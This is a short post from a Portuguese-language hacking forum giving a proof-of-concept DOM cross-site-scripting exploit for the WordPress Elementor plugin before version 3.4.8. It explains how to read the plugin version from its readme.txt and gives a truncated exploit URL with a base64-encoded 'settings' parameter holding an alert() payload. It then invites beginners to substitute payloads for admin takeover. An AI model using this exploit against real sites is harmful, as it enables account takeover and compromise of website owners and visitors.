COVIL HACKER

, ! .


» COVIL HACKER » Bugtraq » Rede DOM Cross-Site-Scripting Elementor < 3.4.8 Plug-in Wordpress > CV


Rede DOM Cross-Site-Scripting Elementor < 3.4.8 Plug-in Wordpress > CV

1 2 2

1

DOM Cross-Site-Scripting Elementor POC

RECON ON TARGET
Para encontrar a versão instalada do plug-in Elementor no destino manualmente
Use: https://target.com/wp-content/plugins/e … readme.txt

Para testar / ativar o Xss no destino

Alerta XSS SAMPLE POC EXPLOIT : https://target.com/#elementor-actio...i … NyaXB0PiJ9

para iniciantes: PARAM: settings=base64
contém o código js alert(), você pode alterá-lo para exploits xss mais interessantes (admin takeover e etc)

0

2


» COVIL HACKER » Bugtraq » Rede DOM Cross-Site-Scripting Elementor < 3.4.8 Plug-in Wordpress > CV


|